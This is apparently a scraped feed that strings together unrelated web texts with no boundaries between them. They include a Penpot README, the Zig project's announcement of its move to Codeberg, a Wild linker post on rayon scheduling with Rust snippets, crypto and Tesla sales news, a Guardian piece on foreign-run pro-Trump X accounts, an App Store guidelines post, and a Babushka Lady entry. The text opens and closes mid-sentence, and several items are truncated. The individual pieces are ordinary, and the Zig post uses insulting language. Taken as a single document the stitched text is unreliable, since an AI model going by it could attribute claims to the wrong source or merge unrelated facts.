is a writer based in Charleston, South Carolina, and has been an editor at All That's Interesting since 2022. She holds a B.A. in English and Creative Writing from Washington & Lee University and an M.A. in English from College of Charleston. Over her nine-year career she has worked for publications ranging from wedding magazines to Shakespearean literary journals, including work with Arbordale Publishing and Gulfstream Communications.]
Penpot is the first
open-source
design tool for design and code collaboration. Designers can create stunning designs, interactive prototypes, and design systems at scale, while developers enjoy ready-to-use code that makes their workflow easy and fast. And all of this with no handoff drama.
Available on browser or self-hosted, Penpot works with open standards like SVG, CSS, HTML and JSON, and it’s free!
The latest updates take Penpot even further. It’s the first design tool to integrate native
design tokens
—a single source of truth to improve efficiency and collaboration between product design and development.
With the
huge 2.0 release
, Penpot took the platform to a whole new level. This update introduces the ground-breaking
CSS Grid Layout feature
, a complete UI redesign, a new Components system, and much more.
For organizations that need extra service for their teams,
get in touch
🎇 Design, code, and Open Source meet at
Penpot Fest
! Be part of the 2025 edition in Madrid, Spain, on October 9-10.
Penpot expresses designs as code. Designers can do their best work and see it will be beautifully implemented by developers in a two-way collaboration.
Plugin system
Penpot plugins
let you expand the platform's capabilities, give you the flexibility to integrate it with other apps, and design custom solutions.
Designed for developers
Penpot was built to serve both designers and developers and create a fluid design-code process. You have the choice to enjoy real-time collaboration or play "solo".
Inspect mode
Work with ready-to-use code and make your workflow easy and fast. The inspect tab gives instant access to SVG, CSS and HTML code.
Self host your own instance
Provide your team or organization with a completely owned collaborative design tool. Use Penpot's cloud service or deploy your own Penpot server.
Integrations
Penpot offers integration into the development toolchain, thanks to its support for webhooks and an API accessible through access tokens.
Building Design Systems: design tokens, components and variants
Penpot brings design systems to code-minded teams: a single source of truth with native Design Tokens, Components, and Variants for scalable, reusable, and consistent UI across projects and platforms.
Getting started
Penpot is the only design & prototype platform that is deployment agnostic. You can use it in our
SaaS
or deploy it anywhere.
Learn how to install it with Docker, Kubernetes, Elestio or other options on
our website
.
Community
We love the Open Source software community. Contributing is our passion and if it’s yours too, participate and
improve
Penpot. All your designs, code and ideas are welcome!
If you need help or have any questions; if you’d like to share your experience using Penpot or get inspired; if you’d rather meet our community of developers and designers,
join our Community
!
Anyone who contributes to Penpot, whether through code, in the community, or at an event, must adhere to the
code of conduct
and foster a positive and safe environment.
Contributing
Any contribution will make a difference to improve Penpot. How can you get involved?
Participate in the
Community
space by asking and answering questions; reacting to others’ articles; opening your own conversations and following along on decisions affecting the project.
Contribute to Penpot's code:
Watch this video
by Alejandro Alonso, CIO and developer at Penpot, where he gives us a hands-on demo of how to use Penpot’s repository and make changes in both the front end and back end.
To find (almost) everything you need to know on how to contribute to Penpot, refer to the
contributing guide
.
Resources
You can ask and answer questions, have open-ended conversations, and follow along on decisions affecting the project.
This Source Code Form is subject to the terms of the Mozilla Public
License, v. 2.0. If a copy of the MPL was not distributed with this
file, You can obtain one at http://mozilla.org/MPL/2.0/.
Copyright (c) KALEIDOS INC
This book is an introduction to data structures and algorithms for
functional languages, with a focus on proofs. It covers both
functional correctness and running time analysis. It does so in a
unified manner with inductive proofs about functional programs and
their running time functions. All proofs have been
machine-checked by the proof assistant
Isabelle
. The pdf contains
links to the corresponding Isabelle theories.
Click on an image to download the pdf of the whole book:
This book is meant to evolve over time. If you would like to contribute, get in touch!
Migrating the Main Zig Repository from GitHub to Codeberg
Putting aside GitHub’s
relationship with ICE
, it’s abundantly clear that the talented folks who used to work on the product have moved on to bigger and better things, with the remaining losers eager to inflict some kind of bloated, buggy JavaScript framework on us in the name of progress. Stuff that used to be snappy is now sluggish and often entirely broken.
More importantly, Actions is
created by monkeys
and
completely neglected
. After the
CEO of GitHub said to “embrace AI or get out”
, it seems the lackeys at Microsoft took the hint, because GitHub Actions started “vibe-scheduling”: choosing jobs to run seemingly at random. Combined with other bugs and the inability to manually intervene, this causes our CI system to get so backed up that not even master branch commits get checked.
Rather than wasting donation money on more CI hardware to work around this crumbling infrastructure, we’ve opted to switch Git hosting providers instead.
As a bonus, we look forward to fewer violations (exhibit
A
,
B
,
C
) of our
strict no LLM / no AI policy
, which I believe are at least in part due to GitHub aggressively pushing the “file an issue with Copilot” feature in everyone’s face.
GitHub Sponsors
The only concern we have in leaving GitHub behind has to do with GitHub Sponsors. This product was key to Zig’s early fundraising success, and it
remains a large portion of our revenue today
. I can’t thank
Devon Zuegel
enough. She appeared like an angel from heaven and single-handedly made GitHub into a viable source of income for thousands of developers. Under her leadership, the future of GitHub Sponsors looked bright, but sadly for us, she, too, moved on to bigger and better things. Since she left, that product as well has been neglected and is already starting to decline.
Although GitHub Sponsors is a large fraction of Zig Software Foundation’s donation income,
we consider it a liability
. We humbly ask if you, reader, are currently donating through GitHub Sponsors, that you consider
moving your recurring donation to Every.org
, which is itself a non-profit organization.
As part of this, we are sunsetting the GitHub Sponsors perks. These perks are things like getting your name onto the home page, and getting your name into the release notes, based on how much you donate monthly. We are working with the folks at Every.org so that we can offer the equivalent perks through that platform.
Migration Plan
Effective immediately, I have made
ziglang/zig on GitHub
read-only, and the canonical origin/master branch of the main Zig project repository is
https://codeberg.org/ziglang/zig.git
.
Thank you to the Forgejo contributors who helped us with our issues switching to the platform, as well as the Codeberg folks who worked with us on the migration - in particular
Earl Warren
,
Otto
,
Gusted
, and
Mathieu Fenniak
.
In the end, we opted for a simple strategy, sidestepping GitHub’s aggressive vendor lock-in: leave the existing issues open and unmigrated, but start counting issues at 30000 on Codeberg so that all issue numbers remain unambiguous. Let us please consider the GitHub issues that remain open as metaphorically “copy-on-write”.
Please leave all your existing GitHub issues and pull requests alone
. No need to move your stuff over to Codeberg unless you need to make edits, additional comments, or rebase.
We’re still going to look at the already open pull requests and issues
; don’t worry.
In this modern era of acquisitions, weak antitrust regulations, and platform capitalism leading to extreme concentrations of wealth, non-profits remain a bastion defending what remains of the commons.
The
Wild linker
makes very extensive use of
rayon
for parallelism. Much of this parallelism is in the
form of
par_iter
and friends. However, some parts of the linker don’t fit neatly into that model because the amount of work isn’t
known in advance. For example, the linker has two places where it explores a graph. When we start,
we know some roots of that graph, but we don’t know all the nodes that we’ll need to visit. We’ve
gone through a few different approaches for how we implement such algorithms. This post covers those
approaches and what we’ve learned along the way.
Spawn broadcast
Our first approach was to spawn a task for each thread (rayon’s
spawn_broadcast
)
then do our own work sharing and job control between those threads. By “our own job control” I mean
that each thread would pull work from a channel and if it found no work, it’d
park the
thread
. If new work came up, the thread that
produced the work would wake a parked thread.
This was complex. Worse, it didn’t allow us to use other rayon features while it was running. For
example, if we tried to do a par_iter from one of the threads, it’d only have the current thread to
work with because all the others were doing their own thing, possibly parked, but in any case, not
available to rayon.
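Roughly, the shape looked something like the sketch below. This is a simplified reconstruction rather than Wild's actual code: the Job type and process function are assumptions, idle threads here just yield instead of parking and being woken, and waiting for overall completion is left out.

use std::sync::atomic::{AtomicUsize, Ordering};
use std::sync::Arc;

// `Job` and `process` stand in for the linker's real work items and logic.
fn run_with_own_job_control(initial_jobs: Vec<Job>) {
    let (work_send, work_recv) = crossbeam_channel::unbounded::<Job>();
    // Count of jobs that have been queued but not yet finished.
    let pending = Arc::new(AtomicUsize::new(initial_jobs.len()));
    for job in initial_jobs {
        work_send.send(job).unwrap();
    }

    // Run one copy of this loop on every thread in rayon's pool.
    rayon::spawn_broadcast(move |_ctx| loop {
        if pending.load(Ordering::Acquire) == 0 {
            break; // All work finished; every thread exits its loop.
        }
        match work_recv.try_recv() {
            Ok(job) => {
                // `process` may queue follow-up jobs; it must bump `pending`
                // before sending them.
                process(job, &work_send, &pending);
                pending.fetch_sub(1, Ordering::AcqRel);
            }
            // Nothing available right now. The real implementation parked the
            // thread here and had producers wake it when new work arrived.
            Err(_) => std::thread::yield_now(),
        }
    });
    // NB: spawn_broadcast returns immediately; waiting for the work to finish
    // is omitted from this sketch.
}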
Scoped spawning
The idea here is that we create a scope and spawn some initial tasks into that scope. Those tasks
then spawn additional tasks and so on until eventually there are no more tasks.
The rayon documentation warns that this is more expensive than other approaches, so should be
avoided if possible. The reason it’s more expensive is that it heap-allocates the task. Indeed, when
using this approach, we do see increased heap allocations.
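For the graph-exploration case, scoped spawning looks roughly like the following sketch. The Graph type and visited-marking are simplified stand-ins for illustration, not Wild's real data structures.

use std::sync::atomic::{AtomicBool, Ordering};

// Minimal stand-in for the linker's real graph.
struct Graph {
    edges: Vec<Vec<usize>>,
    visited: Vec<AtomicBool>,
}

impl Graph {
    // Returns true if we are the first to visit `node`.
    fn mark_visited(&self, node: usize) -> bool {
        !self.visited[node].swap(true, Ordering::AcqRel)
    }
}

fn explore<'s>(s: &rayon::Scope<'s>, graph: &'s Graph, node: usize) {
    for &next in &graph.edges[node] {
        if graph.mark_visited(next) {
            // Each `spawn` heap-allocates its task closure, which is where the
            // extra allocations mentioned above come from.
            s.spawn(move |s| explore(s, graph, next));
        }
    }
}

fn explore_from_roots(graph: &Graph, roots: &[usize]) {
    rayon::scope(|s| {
        for &root in roots {
            if graph.mark_visited(root) {
                s.spawn(move |s| explore(s, graph, root));
            }
        }
    });
}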
Channel + par_bridge
Another approach that I’ve tried recently and which arose out of the desire to reduce heap
allocations is to put work into a
crossbeam
channel
. The work
items can be an enum if there are different kinds. Our work scope is then just something like the
following:
let (work_send, work_recv) = crossbeam_channel::unbounded();

// Add some initial work items.
for node in roots {
    work_send.send(WorkItem::ProcessNode(node, work_send.clone()));
}

// Drop sender to ensure we can terminate. Each work item has a copy of the sender.
drop(work_send);

work_recv.into_iter().par_bridge().for_each(|work_item| {
    match work_item {
        WorkItem::ProcessNode(node, work_send) => {
            explore_graph(node, work_send);
        }
    }
});
The trick with this approach is that each work item needs to hold a copy of the send-end of the
channel. That means that when processing work items, we can add more work to the queue. Once the
last work item completes, the last copy of the sender is dropped and the channel closes.
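For concreteness, the work item type and graph-exploration function assumed by that snippet might look something like this; successors and mark_visited are placeholders for the linker's real graph accessors, not actual Wild code.

use crossbeam_channel::Sender;

enum WorkItem {
    ProcessNode(usize, Sender<WorkItem>),
}

fn explore_graph(node: usize, work_send: Sender<WorkItem>) {
    for next in successors(node) {
        if mark_visited(next) {
            // Each new item carries its own clone of the sender, so the channel
            // stays open for as long as any work is still in flight.
            let _ = work_send.send(WorkItem::ProcessNode(next, work_send.clone()));
        }
    }
    // `work_send` is dropped here; once the last copy is gone the channel closes
    // and the `par_bridge` iterator terminates.
}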
This approach works OK. It does avoid the heap allocations associated with scoped spawning. It is a
little bit complex, although not as complex as doing all the job control ourselves. One downside is
that like doing job control ourselves, it doesn’t play nicely with using
par_iter
inside of worker
tasks. The reason why is kind of subtle and is due to the way rayon is implemented. What can happen
is that the
par_iter
doesn’t just process its own tasks. It can also steal work from other
threads. When it does this, it can end up blocking trying to pull another work item from the
channel. The trouble is that because the
par_iter
was called from a work item that holds a copy of
the send-end of the channel, we can end up deadlocked. The channel doesn’t close because we hold a
sender and we don’t drop the sender because we’re trying to read from the read-end of the channel.
Another problem with this approach that I’ve just come to realise is that it doesn’t compose well. I
had kind of imagined just getting more and more options in my
WorkItem
enum as the scope of the
work increased. The trouble is that working with this kind of work queue doesn’t play nicely with
the borrow checker. An example might help. Suppose we have some code written with rayon’s
par_chunks_mut
and we want to flatten that work into some other code that uses a channel with work items. First we
need to convert the
par_chunks_mut
code into a channel of work items.
let foo = create_foo();

foo.par_chunks_mut(chunk_size).for_each(|chunk| {
    // Do work with mutable slice `chunk`
});
If we want the creation of
foo
to be a work item and each bit of processing to also be work items,
there’s no way to do that and have the borrow checker be happy.
match work_item {
    WorkItem::CreateAndProcessFoo => {
        let foo = create_foo();
        // Split `foo` into chunks and queue several `WorkItem::ProcessChunk`s….?
    }
    WorkItem::ProcessChunk(chunk) => {
        // Do work with mutable slice `chunk`.
    }
}
So that clearly doesn’t work. There’s no way for us to take our owned
foo
and split it into chunks
that can be processed as separate
WorkItem
s. The borrow checker won’t allow it.
Another problem arises if we’ve got two work-queue-based jobs and we’d like to combine them, but the
second job needs borrows that were taken by the first job to be released before it can run. This
runs into similar problems.
The kinds of code structures we end up with here feel a bit like we’re trying to write async code
without async/await. This makes me wonder if async/await could help here.
Async/await
I don’t know exactly what this would look like because I haven’t yet tried implementing it. But I
imagine it might look a lot like how the code is written with rayon’s scopes and spawning. Instead
of using rayon’s scopes, it’d use something like
async_scoped
.
One problem that I have with rayon currently is, I think, solved by using async/await. That problem,
which I briefly touched on above, is described in more detail here. Suppose we have a
par_iter
inside some other parallel work:
outer_work.par_iter().for_each(|foo| {
    let foo = inputs.par_iter().map(|i| ...).collect();

    // < Some other work with `foo` here, hence why we cannot merge the two par_iters >

    foo.par_iter().map(|i| ...).for_each(|i| ...);
});
If the thread that we’re running this code on becomes idle during the first inner
par_iter
, that
thread will try to steal work from other threads. If it succeeds, then even though all the work of
the
par_iter
is complete, we can’t continue to the second inner
par_iter
until the stolen work
also completes. However, with async/await, tasks are not tied to a specific thread once started.
Threads steal work, but tasks don’t, so the task that’s running the above code would become runnable
as soon as the
par_iter
completed even if the thread that had originally been running that task
had stolen work - the task could just be run on another thread.
It’d be very interesting to see what async/await could contribute to the parallel computation space.
I don’t have any plans to actually try this at this stage, but maybe in future.
Return to scoped spawning and future work
In the meantime, I’m thinking I’ll return to scoped spawning. Using a channel works fine for simple
tasks and it avoids the heap allocations, but it really doesn’t compose at all well.
I am interested in other options for avoiding the heap allocations. Perhaps there are options for
making small changes to rayon that might achieve this, e.g. adding support for spawning tasks
without boxing, provided the closure is less than or equal to, say, 32 bytes. I've yet to explore such
options though.
Thanks
Thanks to everyone who has been
sponsoring
my work on
Wild, in particular the following, who have sponsored at least $15 in the last two months:
CodeursenLiberte
repi
rrbutani
Rafferty97
wasmerio
mati865
Urgau
mstange
flba-eb
bes
Tudyx
twilco
sourcefrog
simonlindholm
petersimonsson
marxin
joshtriplett
coreyja
binarybana
bcmyers
Kobzol
HadrienG2
+3 anonymous
The Tesla Model Y Just Scored the Worst Reliability Rating in a Decade
Bonsai_term is a library that lets you write Terminal UIs (TUIs) using
OCaml. It uses the same programming model as the
bonsai_web
library.
Getting started
If you are new to OCaml - or if you haven't already -
install
opam
. It is OCaml's package manager
and we'll be using it to install
bonsai_term
and its dependencies.
The specific installation instructions depend on your platform. You
can find platform-specific instructions
here
.
bonsai_term
uses
OxCaml
so the next thing
you'll want to do is install
oxcaml
by following the instructions
here
.
Run
opam install bonsai_term
. (This will install
bonsai_term
and its dependencies).
At this point you should now have
bonsai_term
"installed".
To learn how to use
bonsai_term
you can read its MLI
src/bonsai_term.mli
and / or look
at some examples in the
bonsai_term_examples
repo.
To learn how to use
bonsai
, you can read the docs in
bonsai_web
.
(most of those docs are aimed at the "web" version of bonsai, so the "vdom" bits may not
apply, but the "effect" / "state-fulness" and ways of doing "incrementality" all should
transfer from
bonsai_web
into
bonsai_term
).
To learn how to use
ocaml
here are some good resources:
Russell Coker: PineTime Band
PlanetDebian
etbe.coker.com.au
2025-11-27 00:37:27
I’ve had a Pine Time for just over 2 years [1]. About a year ago I had a band break and replaced it from a spare PineTime and now I just had another break. Having the band only last one year isn’t that great, but it’s fortunate that the break only affects the inner layer of plastic so there is no ri...
I started writing this post while using the band from a
Colmi P80 [3]
. I bought one for a relative who wanted the metal band, and the way the AliExpress seller does it is to sell the package with the plastic band and include the metal band in the package, so I had a spare band. It fits quite well, and I didn’t hit any of the reported problems of the PineTime having insufficient space between the spring bar and the watch. The Colmi band in question is described as “rose gold” but is more like “pinkish beige” and doesn’t match the style of the black PineTime.
I ordered a couple of cheap bands from AliExpress which cost $9.77 and $13.55 including postage while the ones that Pine64 recommend have over $15 postage from Amazon!
There are claims that getting a replacement band for a PineTime is difficult. My experience is that every band with a 20mm attachment works as long as it’s designed for a square watch; some bands are designed to partly go around a round face and wouldn’t fit. I expect that some bands won’t fit, but I don’t think it’s enough of a problem to worry about when buying a random band from AliExpress. The incidence of bands not fitting will probably be lower than the incidence of other AliExpress products not doing quite what you want (while meeting the legal criteria of doing what they are claimed to do) and ending up unused.
I’m now wearing the PineTime with the “Magnetic Buckle Watch Strap Band” and plan to wear it for the next year or so.
Sam Roberts, reporting for The New York Times:
David Lerner, a high school dropout and self-taught computer geek
whose funky foothold in New York’s Flatiron district, Tekserve,
was for decades a beloved discount mecca for Apple customers
desperate to retrieve lost data and repair frozen hard dri...
“It was inevitable,” said Jake Ostrovskis, head of OTC trading at Wintermute, referring to the sell-off in digital asset treasury stocks. “It got to the point where there’s too many of them.”
Several companies have begun selling their crypto stockpiles in an effort to fund share buybacks and shore up their stock prices, in effect putting the crypto treasury model into reverse.
North Carolina-based ether holder FG Nexus sold about $41.5 million of its tokens recently to fund its share buyback program. Its market cap is $104 million, while the crypto it holds is worth $116 million. Florida-based life sciences company turned ether buyer ETHZilla recently sold about $40 million worth of its tokens, also to fund its share buyback program.
Sequans Communications, a French semiconductor company, sold about $100 million of its bitcoin this month in order to service its debt, in a sign of how some companies that borrowed to fund crypto purchases are now struggling. Sequans’ market capitalization is $87 million, while the bitcoin it holds is worth $198 million.
Georges Karam, chief executive of Sequans, said the sale was a “tactical decision aimed at unlocking shareholder value given current market conditions.”
While bitcoin and ether sellers can find buyers, companies with more niche tokens will find it more difficult to raise money from their holdings, according to Morgan McCarthy. “When you’ve got a medical device company buying some long-tail asset in crypto, a niche in a niche market, it is not going to end well,” he said, adding that 95 percent of digital asset treasuries “will go to zero.”
Strategy, meanwhile, has doubled down and bought even more bitcoin as the price of the token has fallen to $87,000, from $115,000 a month ago. The firm also faces the looming possibility of being cut from some major equity indices, which could heap even more selling pressure on the stock.
But Saylor has brushed off any concerns. “Volatility is Satoshi’s gift to the faithful,” he said this week, referring to the pseudonymous creator of bitcoin.
Foreign interference or opportunistic grifting: why are so many pro-Trump X accounts based in Asia?
Guardian
www.theguardian.com
2025-11-27 00:01:12
A new feature on the social media platform formerly known as Twitter allows users to see the location of other accounts. It has resulted in a firestorm of recriminations When X rolled out a new feature revealing the locations of popular accounts, the company was acting to boost transparency and clam...
W
hen
X
rolled out a new feature revealing the locations of popular accounts, the company was acting to boost transparency and clamp down on disinformation. The result, however, has been a circular firing squad of recriminations, as users turn on each other enraged by the revelation that dozens of popular “America first” and pro-Trump accounts originated overseas.
The new feature
was enabled over the weekend
by X’s head of product, Nikita Bier, who called it the first step in “securing the integrity of the global town square.” Since then many high-engagement accounts that post incessantly about US politics have been “unmasked” by fellow users.
An Ivanka Trump fan account that posts about illegal immigration to the US was shown to be based in Nigeria. MAGAStorm, spreading conspiracy theories about the assassination attempt on Trump, was found to be in eastern Europe. AmericanVoice, which posts anti-Islam content, is based in India.
Users have noted that a high proportion of these potentially misleading accounts – many of which claim to be in America – are operating from Asia, but experts are in disagreement over whether they may be state-backed influence campaigns or even opportunists trying to make a quick buck.
Monetising ‘rage bait’
In 2024 the
Centre for Information Resilience
(CIR) revealed that a network of accounts on X were posing as young American women, stealing images from European influencers to burnish their credibility. Often these images were manipulated to include pro-Trump hats and clothing.
The new location feature on X has allowed Benjamin Strick, who ran the original investigation, to confirm that almost all of these accounts purporting to be “independent Trump supporting” women are located in Thailand.
Strick noted that while promising to “follow patriots” and “stand with Trump”, these accounts often also posted anti-Islamic content.
In their 2024 report, the CIR found that these accounts exploited “pre-existing societal tensions” in their efforts to spread disinformation.
“Accounts seized upon news stories relating to gender and LGBTQ+ rights, in some cases allowing them to undermine Democratic policies and promote Republican views.”
Fears that foreign actors are using social media to influence US voters reached their zenith in the months after Trump’s 2016 election win over Hillary Clinton. An intelligence assessment the following year detailed the steps that the Russian state took to bolster Trump using bot farms.
In the years since, experts have warned that foreign influence campaigns are becoming more sophisticated, but as America’s politics has become more partisan and voters more siloed, those warnings appear to have been forgotten.
However, it’s possible that the sheer number of pro-Trump accounts around the world might have as much to do with turning a profit as with political influence, says Simon Copland, a researcher at the Australian National University.
“Social media is really based on attention … [and] on places like X or Twitter you can get money from that,” he says, adding that at the moment, the best way to get attention “is to be posting about
Donald Trump
.”
Changes to the way X monetises its content could be a factor as well. In 2024, the platform announced that creators would now be paid based on the levels of engagement with their content. At the time, some expressed concern that this would incentivise users to create more and more controversial content.
“When platforms begin to reward engagement, creators will begin posting anything that drives a discussion of some sort, including posts that are designed to enrage users, forcing them to reply or comment,” TechCrunch wrote at the time.
“That’s where things like rage bait come about,” says Copland. “People deliberately induce rage to try to encourage people to go on to the platforms” and engage in the content.
The calculations used to determine a user’s payments remain opaque and it’s not clear how much money overseas users posing as Maga-faithful could be making. A BBC investigation from 2024 suggested that for some, it could be thousands of dollars. Experts in southeast Asia’s disinformation space say such figures could be highly motivating for people in the region.
A 2021 report into southeast Asia’s “disinformation crisis” found that many accounts pushing xenophobic and misogynistic messages to appeal to the US right were not particularly invested ideologically, but “driven by almost purely entrepreneurial motivations.”
The ‘dark corners’ of the internet
While the perpetually online cadre of Trump’s followers erupt in anger over the origins of some accounts – many of which have now been suspended – others have been left questioning why the issue matters at all.
Copland points to the flow of rightwing ideas, and how policies dreamed up in dank corners of the internet can make their way to the heights of US and European politics.
On the night that X began to reveal the location of accounts, Donald Trump shared a post from an account called Trump_Army_. With nearly 600,000 followers, the account regularly amplifies conspiracy theories; in a recent post it asked its followers if “JFK was killed for trying to expose the same crooks Trump is now exposing”. Soon after, another user pointed out that Trump_Army_ was based in India.
It’s among the more innocuous examples, but illustrative of the way the wider ecosystem of right-wing politics operates online.
“Extreme ideas start in these dark corners of the internet. They spread, they become memes, they go on to more mainstream platforms and then you see politicians pick them up,” says Copland.
In May, Trump
ambushed South African president Cyril Ramaphosa
in the Oval Office, accusing him of turning a blind eye to a “white genocide” against South African farmers. These widely discredited claims are thought to have in-part originated in far-right chatrooms.
“We have to be taking this stuff seriously,” he warns, because these ideas “are suddenly becoming mainstream.”
X was approached for comment.
Valhalla's Things: PDF Planners 2026
PlanetDebian
blog.trueelena.org
2025-11-27 00:00:00
Posted on November 27, 2025
Tags: madeof:atoms, madeof:bits, craft:bookbinding
A few years ago I wrote some planner generating code to make myself a
custom planner; in November 2023 I generated a few, and posted them
here on the blog...
A few years ago I wrote some
planner generating code
to make myself a
custom planner; in
November 2023
I generated a few, and posted them
here on the blog, in case somebody was interested in using them.
In 2024 I tried to do the same, and ended up being even later, to
the point where I didn’t generate any (uooops).
I did, however, start to write a Makefile to automate the generation
(and got stuck on the fact that there wasn’t an easy way to deduce the
correct options needed from just the template name); this year, with the
same promptness as in 2023 I got back to the Makefile and finished it, so
maybe next year I will be able to post them early enough for people to
print and bind them? maybe :)
Anyway, these are all of the variants I currently generate, for 2026.
The files with
-book
in the name have been imposed on A4 paper for a
16 pages signature. All of the fonts have been converted to paths, for
ease of printing (yes, this means that customizing the font requires
running the script, but the alternative also had its drawbacks).
Some of the planners include ephemerids and moon phase data: these have
been calculated for the town of Como, and specifically for
geo:45.81478,9.07522?z=17
, because that’s what
everybody
needs, right?
If you need the ephemerids for a different location and can’t run the
script yourself (it depends on pdfjam, i.e. various GB of LaTeX, and a
few python modules such as dateutil, pypdf and jinja2), feel free to
ask: unless I receive too many requests for this to be sustainable, I’ll
generate them and add them to this post.
I hereby release all the PDFs linked in this blog post under the
CC0
license
.
You may notice that I haven’t decided on a license for the code dump
repository; again if you need it for something (that is compatible with
its unsupported status) other than running it for personal use (for
which afaik there is an implicit license) let me know and I’ll push
“decide on a license” higher on the stack of things to do :D
Finishing the Makefile meant that I had to add a tiny feature to one of
the scripts involved, which required me to add a dependency to
pypdf
:
up to now I have been doing the page manipulations with
pdfjam
, which
is pretty convenient to use, but also uses LaTeX, and apparently not
every computer comes with texlive installed (shocking, I know).
If I’m not mistaken, pypdf can do all of the things I’m doing with
pdfjam, so maybe for the next year I could convert my script to use that
one instead.
But then the planners 2027 will be quick and easy, and I will be able to
publish them
promptly
, right?
Running to the Press
Daring Fireball
daringfireball.net
2025-11-26 23:55:20
Regarding my earlier post on similarities between the 2010 App Store Guidelines and today’s: Notably absent from the current guidelines (I think for a very long time) is the specious but very Jobsian claim that “If you run to the press and trash us, it never helps.” Getting the press on your side is...
(a) Come up with your own ideas. We know you have them, so make
yours come to life. Don’t simply copy the latest popular app
on the App Store, or make some minor changes to another app’s
name or UI and pass it off as your own. In addition to risking
an intellectual property infringement claim, it makes the App
Store harder to navigate and just isn’t fair to your fellow
developers.
(b) Submitting apps which impersonate other apps or services is
considered a violation of the Developer Code of Conduct and
may result in removal from the Apple Developer Program.
(c) You cannot use another developer’s icon, brand, or product
name in your app’s icon or name, without approval from the
developer.
It’s guideline (c) that’s new, but I like guideline (a) here. Not just the intent of it, but the language. It’s clear, direct, and human. It reminds me of the tone of the very early guidelines, when it seemed like Steve Jobs’s voice was detectable in some of them.
In a post back in 2010, I wrote
:
This new document is written in remarkably casual language. For
example, a few bullet items from the beginning:
We have over 250,000 apps in the App Store. We don’t need any
more Fart apps.
If your app doesn’t do something useful or provide some form of
lasting entertainment, it may not be accepted.
If your App looks like it was cobbled together in a few days, or
you’re trying to get your first practice App into the store to
impress your friends, please brace yourself for rejection. We
have lots of serious developers who don’t want their quality
Apps to be surrounded by amateur hour.
We will reject Apps for any content or behavior that we believe
is over the line. What line, you ask? Well, as a Supreme Court
Justice once said, “I’ll know it when I see it”. And we think
that you will also know it when you cross it.
If your app is rejected, we have a Review Board that you can
appeal to. If you run to the press and trash us, it never helps.
Some of that language remains today. Here’s the current guideline for section 4.3:
4.3 Spam [...]
(b) Also avoid piling on to a category that is already saturated;
the App Store has enough fart, burp, flashlight, fortune
telling, dating, drinking games, and Kama Sutra apps, etc.
already. We will reject these apps unless they provide a
unique, high-quality experience. Spamming the store may lead
to your removal from the Apple Developer Program.
I could be wrong, but my sense is that Apple has, without much fanfare, cracked down on scams and rip-offs in the App Store. That doesn’t mean there’s none. But it’s like crime in a city: a low amount of crime is the practical ideal, not zero crime. Maybe Apple has empowered something like the “
bunco squad
” I’ve wanted for years? If I’m just unaware of blatant rip-offs running wild in the App Store, send examples my way.
★
Wednesday, 26 November 2025
Tesla's European sales tumble nearly 50% in October
Tesla's (
TSLA
) Europe woes are only getting worse.
According to the
European Automobile Manufacturers' Association
(ACEA), Tesla electric vehicle registrations (a proxy for sales) in Europe fell to just 6,964 units in October, a 48.5% drop compared to a year ago. Meanwhile, total EV registrations in the region, which includes the UK and the European Free Trade Association, rose 32.9% in October, with overall registrations regardless of powertrain up 4.9%.
October's total marks the 10th straight month of declining Tesla sales in Europe. Meanwhile, the overall market share of EVs in the broader European region grew to 16.4%.
Tesla's sales hangover rolled on in certain key European territories, with the introduction of the revamped Model Y not enough to blunt the effect of rising competition and CEO Elon Musk's deep unpopularity.
October's sales slide follows a rough 2025 for Tesla year to date in broader Europe.
In the first 10 months of the year, Tesla sales dropped 29.6% to 180,688 units, per the ACEA. Meanwhile, Tesla's overall market share in Europe dropped to 1.6% from 2.4% a year ago.
Meanwhile, Tesla's Chinese competitor BYD (
BYDDY
), which sells a mix of pure EVs and hybrids, reported sales jumping 207% to 17,470 units sold in Europe. Another major China rival, SAIC, saw sales climb 46% to just under 24,000 vehicles sold.
While weakening sales in a key, EV-centric region should be a concern, it hasn't been a significant issue for Tesla stock.
The interior of the new Tesla Model 3 with Full Self-Driving activated, highlighting the advanced autonomous driving system and design of Tesla's electric vehicles, in Bari, Italy, on Sept. 6, 2025. (Matteo Della Torre/NurPhoto via Getty Images)
·
NurPhoto via Getty Images
"One of the reasons we called Tesla a 'must own' in our recent launch — despite all the obvious risks — is that the world is about to change, dramatically," analyst Rob Wertheimer wrote. "Autonomy is coming very soon, and it will change everything about the driving ecosystem.”
The main spark appears to be the latest version of Tesla's full self-driving (FSD) software, which is available in the US and select territories.
While investors own Tesla stock mostly for the AI and autonomous potential, there could be good news from the self-driving front for European buyers.
The Netherlands RDW automotive governing body said it has set up a schedule allowing Tesla to demonstrate in February
whether FSD meets requirements
but has not approved it yet.
Getting at least one automotive regulator in Europe to approve FSD would be a huge step in the right direction for Tesla and may help staunch the sales slide in the region.
The Babushka Lady was seen to be holding a camera by eyewitnesses and was also seen in film accounts of the assassination.
[
1
]
[
2
]
She was observed standing on the grass between Elm and Main streets, standing amongst onlookers in front of the Dallas County Building, and is visible in the
Zapruder film
, as well as in the films of
Orville Nix
,
[
3
]
Marie Muchmore
, and Mark Bell,
[
4
]
44 minutes and 47 seconds into the Bell film; even though the shooting had already taken place and most of her surrounding witnesses took cover, she can be seen still standing with the camera at her face. After the shooting, she crossed Elm Street and joined the crowd that went up the
grassy knoll
.
The Babushka Lady is last seen in photographs walking east on Elm Street. Neither she nor the film she may have taken has ever been positively identified. Her first appearance on film chronologically is on the sidewalk in front of the Dallas County Building, which is visible in an image as being on Kennedy's right. She would have crossed Houston Street and onto Dealey Plaza in order to be visible in the Dealey Plaza images. This may imply that the images show two different women of similar appearance. It is plausible that once the motorcade passed by she was able to cross the street to catch a second motorcade drive past on Dealey Plaza where she would be on Kennedy's left.
In 1970, a woman named Beverly Oliver told conspiracy researcher Gary Shaw at a church
revival meeting
in
Joshua, Texas
, that she was the Babushka Lady.
[
5
]
Oliver stated that she filmed the assassination with a Super 8 film camera made by
Yashica
and that she turned the undeveloped film over to two men who identified themselves to her as FBI agents.
[
5
]
According to Oliver, she obtained no receipt from the men, who told her that they would return the film to her within ten days. She did not follow up with an inquiry.
[
5
]
Oliver reiterated her claims in the 1988 documentary
The Men Who Killed Kennedy
.
[
5
]
According to
Vincent Bugliosi
, Oliver has "never proved to most people's satisfaction that she was in Dealey Plaza that day".
[
5
]
Confronted with the fact that the Yashica Super-8 camera was not made until 1969, she stated that she received the "experimental" camera from a friend and was not sure the manufacturer's name was on it.
[
5
]
Oliver's claims were the basis for a scene in
Oliver Stone
's 1991 film
JFK
, in which a character named "Beverly" meets
Jim Garrison
in a Dallas nightclub.
[
6
]
Played by
Lolita Davidovich
, she is depicted in the
director's cut
